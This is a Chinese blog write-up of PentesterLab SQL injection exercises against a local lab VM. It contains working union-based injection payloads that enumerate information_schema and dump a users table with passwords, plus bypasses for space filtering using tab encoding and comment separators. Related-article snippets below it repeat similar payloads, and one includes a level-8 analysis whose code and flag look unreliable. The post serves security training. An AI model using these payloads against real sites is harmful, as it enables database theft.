Pentester Lab闯关记录2(SQL Injections)

最新推荐文章于 2022-04-11 10:38:08 发布
最新推荐文章于 2022-04-11 10:38:08 发布
阅读量477 收藏 3
点赞数 1
分类专栏: 渗透测试基础 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43408042/article/details/109083237
版权

Pentester Lab闯关记录2(SQL Injections)

example1

验证漏洞是否存在

首先构造下面payload测试是否存在sql注入漏洞:

http://192.168.202.131/sqli/example1.php?name=root’ and 1=1 --+  payload为:’ and 1=1 --+
首先使用'闭合sql语句中的’,然后注入payload,使用--+注释掉后面的内容

发现正常返回内容

在这里插入图片描述
再构造以下payload测试:

http://192.168.202.131/sqli/example1.php?name=root’ and 1=2 --+  payload为:’ and 1=1 --+
首先使用'闭合sql语句中的’,然后注入payload,使用--+注释掉后面的内容

测试发现不能正常返回
在这里插入图片描述
这里证明存在sql注入漏洞,下面进行sql注入。

猜测查询返回的列数

构造以下payload,测试当前查询有多少列,方便构造后续的payload:

http://192.168.202.131/sqli/example1.php?name=root' order by 1 --+

可以发现正常返回内容:
在这里插入图片描述
继续增加值测试,直到不能正常返回内容,确定查询的列数:
测试发现payload为 ' order by 6 --+时,不能正常返回,由此可以确认查询的列数为5
在这里插入图片描述
根据上面的的判断构造以下payload:

http://192.168.202.131/sqli/example1.php?name=root' union select 1,2,3,4,5--+

发现能够正常返回内容:
在这里插入图片描述
说明上述判断正确,原因是union语句成功的前提是前后两个sql语句查询的列数必须相同,否则不能正常输出内容。
注:有教程说必须要修改参数为-1使union前面的sql语句报错,然后才能正常输出后面sql语句的内容,可能是因为靶场环境不同,本文中用到的靶场中不存在这一问题,如果确认构造的payload没有问题,但是union后面的sql语句无法输出内容,可以尝试构造以下payload使union前面的sql语句产生错误,只输出后面的sql语句的查询结果。

http://192.168.202.131/sqli/example1.php?name=-1' union select 1,2,3,4,5--+

收集数据库基本信息

继续构造以下payload收集数据库的基本信息

192.168.202.131/sqli/example1.php?name=-1' union select database(),version(),user(),4,5--+

返回以下内容:
在这里插入图片描述
根据上图可以看到返回了数据库的基本信息:

database:exercises	            # 当前数据库名
vesion:5.1.66-0+squeeze1	    # 当前数据库版本
user:pentesterlab@localhost     # 当前用户名

可以看到数据库版本为5.1.66,mysql 5.x以上版本的数据库为了方便管理,默认定义了information_schema数据库,用来存储数据库元信息。其中定义了表schemata_name(数据库名),tables(表名),columns(列名)。
schemata_name表中,schema_name字段用来存储数据库名
tables表中,table_schema和table_name分别用来数据库库名和表名
columns表中,table_schema,table_name,column_name分别用来存储数据库名,表名和字段名

爆破数据库

下面根据其中的columns表爆破出表名:
构造以下payload:

http://192.168.202.131/sqli/example1.php?name=-1' union select table_schema,table_name,column_name,4,5 from information_schema.columns --+

测试成功返回数据库信息,第一列是数据库名,第二列是对应的的表名,第三列是对应的列名

在这里插入图片描述
我们在这些信息中找到我们最感兴趣的内容
在这里插入图片描述
上图中我们发现了当前数据库中中存在一个user表,其中分别有name,age,groupid,passwd这些列,下面我们尝试构造以下payload对user表内容进行爆破:

http://192.168.202.131/sqli/example1.php?name=-1' union%20select id,name,age,groupid,passwd from users --+

爆破出以下内容:
在这里插入图片描述
稍微调整显示顺序可以看到用户名及对应的密码信息:
在这里插入图片描述

example2

验证漏洞是否存在

构造以下payload:

http://192.168.202.131/sqli/example2.php?name=root' and 1=1 --+

测试发现报出错误
在这里插入图片描述
错误信息:ERROR NO SPACE,发现是因为过滤了空格,因此使用url编码%20替换空格,继续构造以下payload:

http://192.168.202.131/sqli/example2.php?name=root%27%09and%091=1%09%23
%27:'
%09:水平制表符替换空格
%23:#注释后面的内容

爆破数据库

后面的注入流程和example1一致,只需要将空格替换为%09即可。
构造最终的payload,爆破数据库内容:

http://192.168.202.131/sqli/example2.php?name=root%27%09union%09select%09id,name,age,groupid,passwd%09from%09users%23

在这里插入图片描述

example3

验证漏洞是否存在

构造以下payload:

http://192.168.202.131/sqli/example3.php?name=root' and 1=1 --+
http://192.168.202.131/sqli/example3.php?name=root%27%09and%091=1%09%23

测试发现制表符也被过滤了,尝试用注释符绕过,构造以下payload:

http://192.168.202.131/sqli/example3.php?name=root%27/**/and/**/1=1%23

测试成功返回
在这里插入图片描述
修改payload:

http://192.168.202.131/sqli/example3.php?name=root%27/**/and/**/1=2%23

测试发现无法正常返回
在这里插入图片描述
证明存在sql注入漏洞

爆破数据库

注入过程依然和example类似,将空格换成/**/即可,我们直接构造最终的payload测试爆破是否能够成功:

http://192.168.202.131/sqli/example3.php?name=root%27/**/union/**/select/**/id,name,age,groupid,passwd/**/from/**/users%23

测试爆破成功
在这里插入图片描述

example3

验证漏洞是否存在

根据url结构可以发现这是一个数字型注入
构造以下payload:

http://192.168.202.131/sqli/example4.php?id=3%20and%201=1#

爆破数据库

注入过程依然和example类似,我们直接构造最终的payload测试爆破是否能够成功:

http://192.168.202.131/sqli/example4.php?id=3%20union%20select%20id,name,age,groupid,passwd%20from%20users#

测试爆破成功
在这里插入图片描述
剩下的后续继续更新

weixin_43408042
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pentesterlab-sql
qq_44881113的博客
11-02 312
第一关 http://192.168.1.142/sqli/example1.php?name=root 有可见传递参数,测试是否存在注入 http://192.168.1.142/sqli/example1.php?name=root’ 报错即存在注入 pyaload http://192.168.1.142/sqli/example1.php?name=root' order by 1 %23 http://192.168.1.142/sqli/example1.php?name=root%27uni
PentesterLab-From SQL Injection to Shell
weixin_30530339的博客
09-14 197
一、打开靶机ip出现如下界面: 随便点一下,点到test链接,访问了如下url:http://192.168.109.131/cat.php?id=1,这里出现了一个id,常规思路这个位置可能有sql注入。然后看其他链接,都差不多,直到点到Admin的链接时,出来一个后台。 二、SQL注入先行 既然有id=1,首先看下这个id是字符还是数字,后面加一个 ' 号,出现了Mysql的报...
Web for pentester_writeup之SQL injections篇
ditanji3425的博客
08-07 406
Web for pentester_writeup之SQL injections篇 SQL injections(SQL注入) Example 1 测试参数,添加 and '1'='1, 'and '1'='2判断存在注入 猜解查询列数(%23为#号的URL编码,注释原有结构的单引号 http://192.168.219.136/sqli/example1.php?name=roo...
1.sql注入-----Pentesterlab2
qwsn
11-04 1843
Example 1: 输入:' SELECT * FROM users WHERE username=’’’ AND password=’’
Pentester Lab SQL to shell
hl1293348082的专栏
04-11 305
PentesterLab提供了可用于测试和了解漏洞的易受攻击的系统。 官方地址:https://pentesterlab.com/ 渗透环境 Kali 192.168.22.128 靶机 我们去发现。(在同一内网) 正文开始 首先先介绍一款工具,个人觉得老牛逼——Netdiscover,之前我询问一哥们arp扫描工具时他推荐的。 工具可以在网络上扫描IP地址,检查在线主机或搜索为它们发送的ARP请求, root@kali:~# netdiscover //直接回车不带任何 自动快速发现
web_for_pentester.pdf
04-02
web for pentester是国外安全研究者开发的的一款渗透测试平台,通过该平台你可以了解到常见的Web漏洞检测技术。
web-for-pentester源码.rar
最新发布
07-13
web-for-pentester源码
Eskwela OS v2 PenTester 64bit:PenTester的版本用于教育和安全性分析。-开源
05-09
这是Eskwela OS版本2-PenTester的版本(64位)。 这是由Eskwela OS制作的专门发行版。 它基于Ubuntu 14.04 LTS和Kali Linux中提供的某些软件相结合。 将此分发用于教育目的,渗透测试和安全性分析。
freecodecamp-pentester-course
03-10
《freecodecamp-pentester-course》是针对网络安全与渗透测试的一个学习课程,主要聚焦于JavaScript技术的应用。在这个课程中,你将深入理解如何利用JavaScript进行安全评估和防护,为成为一名合格的渗透测试工程师...
Nmap-For-Pentester
05-22
Nmap for Pesterester 该备忘单是专为Red Teamers和渗透测试人员而设计的,以便帮助他们使用“ Nmap”来查找漏洞。 它的设计使初学者可以了解基础知识,而专业人士可以使用高级选项来提高自己的技能。...
[Pentester Lab]From SQL Injection to Shell
CD的博客
04-07 649
本文翻译了[Pentester Lab]From SQL Injection to Shell的要点,记录了笔者按照教程进行复现的过程。 By the way,庆祝一下自己拿到的第一个Web Shell(虽然是靶机233333 1. 介绍 实验目的: 在基于PHP的网站中使用SQL注入,以及攻击者如何使用SQL注入获取管理员界面的访问权限。然后,攻击者可以在Server上实现代码执行...
pentestlab II web injection
weixin_41791247的博客
05-14 600
example 1:SELECT * FROM users WHERE username='' AND password='' 简单注入,用' or 1=1 # 闭合语句,井号忽略后面语句SELECT * FROM users WHERE username='' or 1=1 # ' AND password=''example 2:' or 1=1 #没有报错,要求只能返回一个值,使用LIMIT...
PentesterLab » Web for Pentester 通关笔记
weixin_44377940的博客
02-08 996
寒假看到一个练习题,很有意思也很适合我这样的新手,于是下载下来练手。 下载地址
PentesterLab靶场sql注入流程
m0_37570494的博客
01-28 3813
环境安装 随便在网上找了个Pentester的靶场,结果是2013年的,那就从2013年的这个靶场开始学习 下载镜像的地址: https://pentesterlab.com/exercises/web_for_pentester_II/iso 正常找个虚拟机,进行iso的安装 安装完成后,查下虚拟机的IP,直接访问即可http://192.168.29.129/ sql注入 Example 1 万能密码: 自己尝试了几个密码,筛选出了这几个通关的,亲试可用: admin'or 1=
PentesterLab食用教程
weixin_30297281的博客
03-27 452
下载:链接: https://pan.baidu.com/s/15jtwClPOVcm3WzNheYBdwQ 密码: uc55 首先安装虚拟机什么的,以及ISO文件导入。这里不要配置过低,否则可能会出现一些很奇怪的问题。 其次,配置一下网络,网络上也有其他的配置方案。我这里用的是桥接方式。 然后,点击确定。打开虚拟机,输入ifconfig,查看一下ip,应该是同一个网段的,我的宿主机ip:1...
20210206pentestLab1靶场LDAP attack
qq_45290991的博客
02-06 518
PentesterLab 简介web for pentester是国外安全研究者开发的的一款渗透测试平台,包含以下主要的漏洞:Code injection (代码注入)Commands injection(命令行注入)XSS(跨站脚本)SQL injections(sql注入)File include(文件包含)LDAP attacks(LDAP攻击)File Upload(文件上传)XML attacks(XML攻击)个人感觉还是不错的,但是国内基本上搜不到教程,官网上的教程确实有点价格不菲,所以在此打算
通过Pentester_Lab学习XML注入
Mi1k7ea
05-14 1510
Pentester Lab是一款老外编写的Web渗透练习环境。   XML注入相关概念: XML是一种可扩展标记语言,可以理解为HTML的扩展语言,一般用于数据存储、数据传输、数据共享,其中DTD文档来解释XML文档。XML必须包含根元素,所有的标签都要闭合,对大小写敏感,并且属性值需要加引号。 XML注入即XXE(XML外部实体注入),是指利用可控的参数或入口来加载不可控的参数或代码,造...
iosline.php注入,PentesterLab新手教程(一):代码注入
weixin_39855944的博客
03-24 225
PentesterLab 简介Web for pentester 是国外安全研究者开发的的一款渗透测试平台。这个平台包含的主要漏洞如下:Code injection (代码注入)Commands injection(命令行注入)XSS(跨站脚本)SQL injections(sql注入)File include(文件包含)LDAP attacks(LDAP攻击)File Upload(文件上传)X...
PentesterLab渗透演练平台
weixin_33695450的博客
04-02 975
转载自: https://www.blackh4t.org/archives/1143.html http://www.91ri.org/5958.html web for pentester是国外安全研究者开发的的一款web渗透测试平台(环境) 通过该平台你可以了解到常见的Web漏洞检测技术。 1、什么是WebAp...
Web For Pentester 第八关分析
06-07
第八关的网页源代码如下: ```html <!DOCTYPE html> <html> <head> <title>Web for Pentester</title> <meta charset="UTF-8"> </head> <body> <h1 align="center">Welcome to Web for Pentester</h1> <div align="center"> <img src="8.jpg" alt="web for pentester"> </div> <div align="center"> <form method="post" action="index.php"> <input type="text" name="flag"> <input type="submit" value="Submit"> </form> </div> </body> </html> ``` 从代码中可以看出,这是一个简单的表单,让用户输入 flag 并提交表单。flag 会被提交到 index.php 页面。 我们可以尝试输入一些字符串进行测试,但是没有提示错误或者正确的信息。因此,我们需要分析 index.php 页面的代码,看看它是如何处理 flag 的。 ```php <?php if (isset($_POST['flag'])) { $flag = $_POST['flag']; if (preg_match('/^[a-zA-Z0-9]+$/', $flag)) { if (strlen($flag) < 10) { echo 'Flag is too short'; } elseif (strlen($flag) > 20) { echo 'Flag is too long'; } elseif ($flag === 'web_for_pentester') { echo 'Congratulations! You have completed the challenge'; } else { echo 'Incorrect flag'; } } else { echo 'Invalid characters found'; } } ?> ``` 从代码中可以看出,flag 必须由字母和数字组成,并且长度必须在 10 到 20 之间。如果 flag 符合要求,那么就会与 "web_for_pentester" 对比。如果匹配,就输出 "Congratulations! You have completed the challenge"。否则,输出 "Incorrect flag"。 我们可以尝试输入不同长度的字符串,例如 "abc"、"12345678901234567890" 和 "web_for_pentester",从而找到正确的 flag。 因此,第八关的 flag 是 "web_for_pentester"。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值